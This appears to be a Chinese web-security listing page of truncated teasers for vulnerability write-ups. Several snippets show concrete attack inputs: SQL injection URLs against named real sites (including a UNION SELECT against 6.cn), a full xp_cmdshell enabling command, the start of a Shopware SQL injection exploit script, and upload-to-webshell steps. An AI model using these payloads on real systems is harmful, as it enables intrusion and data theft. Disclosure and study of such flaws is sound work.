From XSLT code execution to Meterpreter shells - 网站安全关注热度:32

This article will describe how to execute high-level code during the processing of a XSL transform, with the goal of obtaining some Meterpreter shells. It applies to any.....[详情]

HZHost虚拟主机提权实例 - 网站安全 - 自学php关注热度:32

同《N点虚拟主机提权实例》一样，这台主机也是趟枪。今天有人问有没有没加密的asp的webshell，他说因为很多加密过的webshell都有后门，要么就没几天就被人挂上马了，不加密的好点我说..[详情]

N点虚拟主机提权实例 - 网站安全 - 自学php关注热度:50

一开始看的时候我就知道是一台虚拟主机，而且应该支持php,asp,aspx这个站首先我找到了一个FCKeditor，这个FCK编辑器没有FileManager文件夹，于是我构造了/fckeditor/editor/fckeditor.html?toolbar=def..[详情]

phpcms v9.1.15 20120606 多处sql及XSS缺陷及修复 - 网站关注热度:23

PhpcmsV9最新版SQL注射+XSSXSSpublic function public_get_suggest_keyword() { $url = $_GET[#39;url#39;].#39;q=#39;.$_GET[#39;q#39;]; echo $url; $res = @file_get_contents($url); if(.....[详情]

Site5 WordPress电子邮件欺骗漏洞 - 网站安全 - 自学关注热度:17

以下是利用本地搭建的site5 wordpress漏洞文件：diary, simploblack, simplo, journalcrunch, boldy, webfoliomy $theme = lsquo;diaryrsquo;;my $url = $wordpress.rsquo;wp-content/themes/rs.....[详情]

WebPagetest <= 2.6多重缺陷及修复 - 网站安全 - 自关注热度:19

[ WebPagetest = 2.6 ] Multiple Vulnerabilities ######################################################## Script: WebPagetest provides a system for testing the performance of web.....[详情]

樱桃企业网站管理系统 2.1 多处鸡肋漏洞 - 网站关注热度:14

验证文件seeion.asp%if session(user_name) then%%Else www.2cto.com response.Write scriptalert(#39;非法操作！#39;);window.location.href=#39;login.asp#39;;/scriptEnd If%直接将.....[详情]

新浪微博老蠕虫代码分析 - 网站安全 - 自学php关注热度:8

逛酷壳看到2011年新浪那次比较大的XSS蠕虫传播事件，Post上给出了蠕虫的代码，正好最近实习需要在狂补前端的各种，正好拿来分析下，菜分析，牛无视。事件的经过线索如下：20:14，开..[详情]

设置IIS限制IP访问网站后台及敏感目录 - 网站安全关注热度:117

设置IIS限制指定IP无法访问特定网站目录及设置信任的IP段访问指定的目录，防入侵。操作步骤：IIS管理器--找到你要做策略的站点--然后在后台的目录上点右键属性--选目录安全性--点I..[详情]

网易微博内容存储型+主页存储型+子页面XSS及修复关注热度:10

目前几个有微博的网站，都快转遍了，网易还没检测。今天晚上就跑来对网易微博做了一次检测。发现3处XSS。1. 内容存储型XSS，危害不解释，看到微博即中招。通杀所有浏览器2. 微博主..[详情]

瑞星分站三处注入及修复 - 网站安全 - 自学php关注热度:14

注入点1：http://chat.rising.com.cn/WebChatReg/deal/findphone.ashx?phone=13800138000un=admin%27%20and%201=1--http://chat.rising.com.cn/WebChatReg/deal/findphone.ashx?phone=13800138000un=admin%27%.....[详情]

Shopware 3.5 SQL注射缺陷及修复 - 网站安全 - 自学关注热度:18

#!/usr/bin/php?php# Exploit Title: Shopware 3.5 - SQL Injection# Date: 13.07.2012# Exploit Author: Kataklysmos# Software Link: http://www.shopware.de/# Version: 3.5function http.....[详情]

PPTV的FCK漏洞修复不完善导致 - 网站安全 - 自学关注热度:12

http://alliance.pptv.com/include/fckeditor/editor/filemanager/connectors/test.htmlhttp://alliance.pptv.com/include/fckeditor/editor/filemanager/connectors/uploadtest.html没有删除 www.2cto.comhttp.....[详情]

emlog4.2.1日志顶踩插件XSS和SQL注入漏洞 - 网站安全关注热度:20

emlog4.2.1日志顶踩插件XSS和SQL注入漏洞装了日志顶踩插件之后会引发xss漏洞，疑似可以进行sql注入...但我并没有看代码- -修复方案：加强过滤- -作者 狗样的男人..[详情]

蚂蚁php分类信息系统 mymps 4.0i多处SQL注入 - 网站安关注热度:20

蚂蚁php分类信息mymps 4.0i多处字符未过滤#39;，存在注入风险，帮朋友解决的时候顺便发上来，希望厂商迅速给补丁详细说明：/include/common.fun.php 96行get参数过滤函数 正则$string = preg_repla..[详情]

计世网分站注入漏洞 - 网站安全 - 自学php关注热度:13

http://soft.ccw.com.cn/soft/list/category/nodeList.php?categoryId=1401level=2nodeId=257/@@version修复方案：过滤摘自 henices..[详情]

六间房一个sql注射 - 网站安全 - 自学php关注热度:19

某分站注入。详细说明：http://m.6.cn/watch_only.php?id=461277 and 1=2 UNION SELECT 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 frominformation_schema.TABLES whe.....[详情]

用sp_configure启用恢复xp_cmdshell 命令 - 网站安全关注热度:18

SQL代码;EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;--..[详情]

Story of a PoC - F5 BIG-IP Cookie Information Disclosure -关注热度:18

Curiosity is the biggest virtue of a hackerrsquo;s mindset. Only because curiosity people like me loose focus of the actual target and run behind the OTHER things. (Any.....[详情]

ShyPost企业网站管理系统V4.3注入XSS漏洞及后台拿关注热度:18

①注入漏洞 1.漏洞文件：Aboutus.asp % !--#include file=Inc/SysProduct.asp -- %Title=Trim(request(Title)) Set rs = Server.CreateObject(ADODB.Recordset) sql=select Content fro.....[详情]

安徽商网建站系统任意文件读取漏洞及修复 - 网关注热度:18

应厂商要求已删除。..[详情]

5个PHP安全措施 - 网站安全 - 自学php关注热度:17

多年来，PHP一直是一个稳定的、廉价的运行基于web应用程序的平台。像大多数基于web的平台一样，PHP也是容易受到外部攻击的。开发人员、数据库架构师和系统管理员在部署PHP应用程序..[详情]

腾讯QQ牧场秒刷300经验漏洞及修复 - 网站安全 -关注热度:18

腾讯旗下的应用QQ牧场，由于设计缺陷，存在可以秒刷300经验的漏洞。直接在post请求中将num改为100，再post就可以了实现打死100个蚊子，秒刷300经验了。设计缺陷，没有判断num的数量是不..[详情]

新浪微博jsonp跨域调用利用蠕虫 - 网站安全 - 自学关注热度:23

福建新浪个人中心调用的两个jsonp接口可以被恶意利用，获取好友信息，并利用cookie劫持无需其他授权发布欺骗信息。就像蠕虫一样传播。关键代码：head meta http-equiv=Content-Type content=te..[详情]

搜狐房产多处站点缺少权限验证及两个注入 - 网关注热度:10

http://sh.focus.cn/group/editphoto.php?group_id=1507photo_id=66772674上面是修改图片的下面是注入http://app.sh.sohu.com/rongwei/bk.php?id=12挺多库哈http://product.news.shou.com/news/babyplan/info.p.....[详情]

Tipask存储型的XSS漏洞 - 网站安全 - 自学php关注热度:15

Tipask问答系统是一款开放源码的PHP仿百度知道程序。以国人的使用习惯为设计理念，采用MVC构架，系统具有速度快，SEO友好，界面操作简洁明快等特点。天极网、戴尔中国、WPS office等大..[详情]

ECshop本地包含漏洞 - 网站安全 - 自学php关注热度:15

js/calendar.php$lang = (!empty($_GET[#39;lang#39;])) ? trim($_GET[#39;lang#39;]) : lsquo;zh_cnrsquo;;//没有过滤，很明显的包含漏洞if (!file_exists(lsquo;../languages/rsquo;. $lang .....[详情]

wordpress暴路径 影响所有版本 - 网站安全 - 自学关注热度:12

缺陷文件:http://www.2cto.com /{Path}/wp-includes/registration-functions.php 关键代码:-www.2cto.com?php/*** Deprecated. No longer needed.** @package WordPress*/_deprecated_file( basena.....[详情]

Joomla远程上传漏洞 可直接getshell - 网站安全 - 自关注热度:26

作者：13371. 有些joomal需要先注册.http://site/index.php?option=com_userview=login2. 到上传地址http://www.2cto.com /index.php?option=com_ksadvertiserItemid=36task=addcatid=0lang=en3. 点击i.....[详情]

315爱购程序任意文件源码查看 - 网站安全 - 自学关注热度:15

pic.phpfunction url_base64_decode($code){ if($code==) return ; $code=str_replace(!,#39;+#39;,$code); $code=str_replace(,,#39;/#39;,$code); $str=base64_decode($code); return $s.....[详情]